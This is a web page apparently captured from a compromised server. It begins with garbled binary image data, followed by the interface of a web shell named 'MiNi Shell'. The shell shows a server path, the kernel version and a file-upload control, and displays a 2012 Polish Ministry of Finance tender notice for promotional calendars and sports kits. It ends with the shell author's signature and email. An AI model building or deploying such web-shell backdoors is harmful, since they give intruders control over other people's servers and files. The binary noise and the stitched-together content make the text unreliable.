JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120928/371166-N-2012.html

<p class="kh_header"><b>Warszawa: Zakup materiałów promocyjnych w ramach promocji projektu Konsolidacja i centralizacja systemów celnych i podatkowych</b><br>
<b>Numer ogłoszenia: 371166 - 2012; data zamieszczenia: 28.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Finansów, Departament Finansów Resortu , ul. Świętokrzyska 12, 00-916 Warszawa, woj. mazowieckie, tel. 22 6943200, faks 22 6944552, 6945890.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mf.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup materiałów promocyjnych w ramach promocji projektu Konsolidacja i centralizacja systemów celnych i podatkowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zaprojektowanie, wykonanie i dostarczenie do siedziby Zamawiającego materiałów promocyjnych w ramach projektu Konsolidacja i centralizacja systemów celnych i podatkowych w tym:
a)	kalendarzy książkowych w formacie zbliżonym do A5 tj. 148mmx210mm (Zamawiający dopuszcza odstępstwa od podanych wymiarów +/- 5mm)  w ilości 250 sztuk. Kalendarze będą posiadały okładkę zaprojektowaną przez Wykonawcę w oparciu o materiały przedstawione po podpisaniu umowy z Zamawiającym. Okładka kalendarzy (CMYK) wykonana z papieru kreda błysk min. 200g/m2, dodatkowo nałożona folia błysk, proste zakończenia narożników okładki. Między tekturą a zadrukowaną przednią okładką umieszczona gąbka introligatorska nadająca efekt wypukłości. Na okładce zostaną wykonane nadruki niżej podanych znaków:
- logo Programu Operacyjnego Innowacyjna Gospodarka,
- logo projektu Konsolidacja i centralizacja systemów celnych i podatkowych,
- logo Unii Europejskiej,
- logo Ministerstwa Finansów.
Kartki w kalendarzu - papier offsetowy min. 80g/m2 w kolorze białym, układ tydzień na dwóch stronach, perforacja narożników, boki z wyciętymi registrami, kilkujęzyczne kalendarium, zaznaczone święta i dni wolne od pracy, zaznaczone imieniny, miejsce na dane personalne, Zamawiający dopuszcza kalendarium kalendarzy w następujących zestawieniach kolorystycznych: szaro-bordowy, szaro-granatowy lub szaro-brązowy,  kalendarz wyposażony w pomarańczową tkaną tasiemkę z umieszczonym na przemian logo KiC i adresem strony internetowej www.kic.gov.pl. Na grzbiecie kalendarza umieszczony nadruk roku 2013 w pionie. Do kalendarza zostanie dołączona wklejka z informacjami o projekcie KiC. Po podpisaniu umowy Zamawiający przekaże Wykonawcy tekst do umieszczenia na wklejkę.
Każdy kalendarz zapakowany w oddzielne tekturowe pudełko. 

b)	kalendarzy książkowych w formacie zbliżonym do B5 tj. 176mmx250mm (Zamawiający dopuszcza odstępstwa od podanych wymiarów +/-5mm), w ilości 250 szt. Kalendarze będą posiadały okładkę zaprojektowaną przez Wykonawcę w oparciu o materiały przedstawione po podpisaniu umowy z Zamawiającym. Okładka kalendarzy (CMYK) wykonana z papieru kreda błysk min. 200g/m2, dodatkowo nałożona folia błysk, proste zakończenia narożników okładki. Między tekturą a zadrukowaną przednią okładką umieszczona gąbka introligatorska nadająca efekt wypukłości. Na okładce zostaną wykonane nadruki niżej podanych znaków:
- logo Programu Operacyjnego Innowacyjna Gospodarka,
- logo projektu Konsolidacja i centralizacja systemów celnych i podatkowych,
- logo Unii Europejskiej,
- logo Ministerstwa Finansów.
Kartki w kalendarzu - papier offsetowy min. 80g/m2 w kolorze białym, układ tydzień na dwóch stronach, perforacja narożników, boki z wyciętymi registrami, kilkujęzyczne kalendarium, zaznaczone święta i dni wolne od pracy, zaznaczone imieniny, miejsce na dane personalne, Zamawiający dopuszcza kalendarium kalendarzy w następujących zestawieniach kolorystycznych: szaro-bordowy, szaro-granatowy lub szaro-brązowy, kalendarz wyposażony w pomarańczową tkaną tasiemkę z umieszczonym na przemian logo KiC i adresem strony internetowej www.kic.gov.pl. Na grzbiecie kalendarza umieszczony nadruk roku 2013 w pionie. Do kalendarza zostanie dołączona wklejka z informacjami o projekcie KiC. Po podpisaniu umowy Zamawiający przekaże Wykonawcy tekst do umieszczenia na wklejkę.
Każdy kalendarz zapakowany w oddzielne tekturowe pudełko.
  
c)	kalendarzy książkowych w formacie zbliżonym do B5 tj. 176mmx250mm (Zamawiający dopuszcza odstępstwa od podanych wymiarów +/-5mm), w ilości 50 szt. Oprawa kalendarza wykonana ze skóry naturalnej, przeznaczona na wymienne wkłady kalendarza (tzw. kieszonki), oba skrzydła kalendarza zaokrąglone zamykane na magnes. Oprawa kalendarza w kolorze grafitowym ew. ciemno-szarym. Na oprawie zostaną umieszczone tłoczenia niżej podanych znaków:
- logo Programu Operacyjnego Innowacyjna Gospodarka,
- logo projektu Konsolidacja i centralizacja systemów celnych i podatkowych,
- logo Unii Europejskiej,
- logo Ministerstwa Finansów
Kartki w kalendarzu - papier offsetowy min. 80g/m2 w kolorze białym, układ tydzień na dwóch stronach, perforacja narożników, boki z wyciętymi registrami, kilkujęzyczne kalendarium, zaznaczone święta i dni wolne od pracy, zaznaczone imieniny,  miejsce na dane personalne, Zamawiający dopuszcza kalendarium kalendarzy w następujących zestawieniach kolorystycznych: szaro-bordowy, szaro-granatowy lub szaro-brązowy, kalendarz wyposażony w pomarańczową tkaną tasiemkę z umieszczonym na przemian logo KiC i adresem strony internetowej www.kic.gov.pl. W górnej części okładki kalendarza umieszczone tłoczenie roku. Do kalendarza zostanie dołączona wklejka z informacjami o projekcie KiC. Po podpisaniu umowy Zamawiający przekaże Wykonawcy tekst do umieszczenia na wklejkę.
Każdy Kalendarz zapakowany w oddzielne tekturowe pudełko.
 
d)	kalendarzy plakatowych w formacie zbliżonym do B1 tj. 670mmx970mm (Zamawiający dopuszcza odstępstwa od podanych wymiarów +/- 10mm) w ilości 250 sztuk, papier kreda błyszcząca o gramaturze min. 200g/m2, jednostronny, z maksymalnym wykorzystaniem powierzchni kalendarza na nadruk w kolorze. Po podpisaniu umowy Zamawiający przekaże Wykonawcy materiał fotograficzny do wykorzystania w projekcie graficznym kalendarza opracowanym przez Wykonawcę. W dolnej części kalendarza umieszczone kalendarium z numeracją tygodni, oznaczeniem innym kolorem świąt i dni wolnych od pracy, z zaznaczeniem imienin. Kalendarium w kolorze ustalonym z Zamawiającym. Na kalendarzu obowiązkowo muszą zostać umieszczone niżej podane znaki:
- logo Programu Operacyjnego Innowacyjna Gospodarka,
- logo projektu Konsolidacja i centralizacja systemów celnych i podatkowych,
- logo Unii Europejskiej,
- logo Ministerstwa Finansów. 
Kalendarz wyposażony w dolną i górną listwę wykonaną z metalu (blacha ocynkowana w kolorze srebrnym) zapobiegającą zwijaniu się kalendarza, w tylnej górnej części kalendarza otwór lub haczyk do zawieszenia kalendarza na ścianie. 
Każdy Kalendarz zapakowany w oddzielną tubę wykonaną z kartonu z plastikowymi denkami. Wymiary tuby dostosowane do rozmiarów kalendarza.
e)	kompletów strojów w ilości 65 sztuk w podziale na następujące rozmiary: 15 kompletów w rozmiarze M, 30 kompletów w rozmiarze L, 20 kompletów w rozmiarze XL. Komplety składać się będą z koszulki z krótkim rękawkiem, spodenek i getr w podziale na rozmiary: 15 par o rozmiarze 40-42, 30 par o rozmiarze 42-44, 30 par o rozmiarze 44-46. Koszulki wykonane z 100% poliester o gramaturze min.145 g/m2 Dri-FIT materiału odprowadzającego podczas wysiłku fizycznego, nadmiar wilgoci na zewnątrz, z wszytymi panelami siatkowymi poprawiającymi wentylację. Spodenki wykonane z 100% poliester o gramaturze min. 145 g/m2 Dri-FIT z wszytym w pasie ściągaczem i sznurkiem. Koszulki i spodenki muszą stanowić jednolity komplet pod względem gatunku i jakości materiału. Z puli 65 kompletów 3 komplety strojów będą składać się z koszulki z długim rękawem oraz krótkich spodenek z wszytymi ochraniaczami antyurazowymi na łokciach i na biodrach. Getry wykonane z bawełny w połączeniu z rozciągliwymi włóknami zapewniającymi przyleganie do stopy z wszytą specjalną siateczką na zgięciu stopy umożliwiającą odprowadzanie wilgoci. Na strojach zostaną obowiązkowo umieszczone nadruki:
- logo Programu Operacyjnego Innowacyjna Gospodarka,
- logo projektu Konsolidacja i centralizacja systemów celnych i podatkowych,
- logo Unii Europejskiej,
- logo Ministerstwa Finansów. 
Zamawiający wymaga żeby stroje były utrzymane w kolorystyce określonej w księdze znaku projektu. Trzy wyszczególnione komplety strojów z długim rękawem i z wszytymi ochraniaczami muszą być utrzymane w innej kolorystyce odróżniającej je od pozostałych kompletów. Dodatkowo na strojach, na wskazanych egzemplarzach przez Zamawiającego, zostaną nadrukowane numery wraz z nazwiskiem osoby, dla której przeznaczony będzie strój. Po podpisaniu umowy Wykonawca przedstawi Zamawiającemu projekt graficzny strojów uwzględniający określoną przez Zamawiającego kolorystykę oraz rozmieszczenie nadruków. Zamawiający po podpisaniu umowy poda Wykonawcy rozmiary trzech wyszczególnionych stroi z długim rękawkiem i z wszytymi ochraniaczami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9, 39.29.41.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości: 1200 zł
2.	Wadium może być wnoszone w jednej lub kilku następujących formach: 
1)	w pieniądzu, 
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy musi być poręczeniem pieniężnym,
3)	gwarancjach bankowych, 
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).
3.	Wniesione wadium musi obejmować okres związania ofertą i nie może zawierać żadnych ograniczeń sprzecznych z ustawą Prawo zamówień publicznych, w szczególności ograniczających możliwość zrealizowania praw określonych w art. 46 ust. 4a i 5 Ustawy.
4.	Wadium wniesione w pieniądzu musi być przelane na rachunek bankowy Ministerstwa Finansów:
BGK I Oddział Warszawa 78 1130 1017 0200 0000 0013 7228
5.	Potwierdzenie wniesienia wadium należy dołączyć do oferty. Wymagane jest doręczenie oryginału dokumentu, a w przypadku wpłaty pieniężnej - kopii dowodu wykonanej operacji.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy Wykonawca wykaże się wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w ciągu ostatnich 3 lat licząc od dnia złożenia oferty, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zamówień polegających na wykonaniu i dostarczeniu kalendarzy książkowych, w tym co najmniej 1 zamówienie o wartości co najmniej 20.000 zł brutto.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje następujące możliwości dokonania istotnych zmian postanowień zawartej umowy: 
1)	niezbędna jest zmiana sposobu wykonania zobowiązania, o ile zmiana taka jest korzystna dla Zamawiającego, z wyjątkiem sytuacji, gdy zmiana ta ingeruje w treść oferty lub jest istotna, lub o ile zmiana taka jest konieczna w celu prawidłowego wykonania Przedmiotu Umowy;
2)	niezbędna jest zmiana Terminu realizacji Umowy w przypadku zaistnienia okoliczności lub zdarzeń uniemożliwiających realizację Umowy w wyznaczonym terminie, na które strony nie miały wpływu.
2.	Wszystkie postanowienia opisane w ust. 1 stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Warunkiem dokonania zmian postanowień zawartej Umowy jest zgoda obu Stron wyrażona na piśmie, pod rygorem nieważności.
3.	Zmiany, o których mowa powyżej, nie mogą w żadnym przypadku stanowić podstawy do zwiększenia wysokości wynagrodzenia Wykonawcy. Każda ze zmian, o których mowa w niniejszym rozdziale może natomiast skutkować obniżeniem wysokości wynagrodzenia Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mf.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Departament Finansów Resortu, 00-916 Warszawa, ul. Świętokrzyska 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2012 godzina 12:00, miejsce: Ministerstwo Finansów, Departament Fisnasów Resortu, 00-916 Warszawa, ul. Świętokrzyska 12, pok. 1316.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 85% w ramach POIG 2007-2013 (środki EFRR) umowa o dofinansowanie projektu wraz z aneksem Nr POIG.07.01.00-00011/09-04 z dn. 02.08.2011.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com